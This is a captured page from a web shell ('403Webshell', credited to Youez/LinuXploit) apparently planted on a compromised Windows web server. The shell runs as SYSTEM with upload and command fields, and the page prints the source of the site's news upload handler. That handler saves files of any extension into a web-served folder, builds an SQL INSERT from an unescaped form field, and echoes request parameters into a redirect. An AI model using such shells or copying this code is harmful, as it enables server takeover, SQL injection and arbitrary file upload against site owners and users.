403Webshell
Server IP : 172.67.187.206  /  Your IP : 172.71.28.155
Web Server : Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
System : Windows NT WIN-ECQAAA40806 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
User : SYSTEM ( 0)
PHP Version : 5.6.30
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /Inetpub/www/news/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /Inetpub/www//news/filems_story_save.php
<?php
include("header.php");
include "db.php";  
$idn = $mysqli->escape_string($_GET['idn']);
$uid = $mysqli->escape_string($_GET['uid']);
$title= $_POST['title'];


	 	//$strFileName = date("YmdHis")."_".$_FILES["filUpload"]["name"][$i];
		$file_tmp=$_FILES["fileUpload"]["tmp_name"];	
		$file_name=$_FILES["fileUpload"]["name"];
			$array_last = explode(".",$file_name);
			$c=count($array_last) - 1;
			$lastname=strtolower($array_last[$c]);
		    $filenew =date("Ydm-His"). "_$idn." .$lastname;
 
		if($_FILES["fileUpload"]["name"] != "")
		{
		if(move_uploaded_file($file_tmp,"myfile/".$filenew))
		{

$mysqli->query("INSERT INTO file(id_news,detail,file_name) VALUES ('$idn','$title', '".$filenew."' )") or die (mysqli_error());
				
			} 
			
		} 
		

	echo "<meta http-equiv=refresh content=0;URL=filems.php?id=$idn&uid=$uid>";
	


?>

Youez - 2016 - github.com/yon3zu
LinuXploit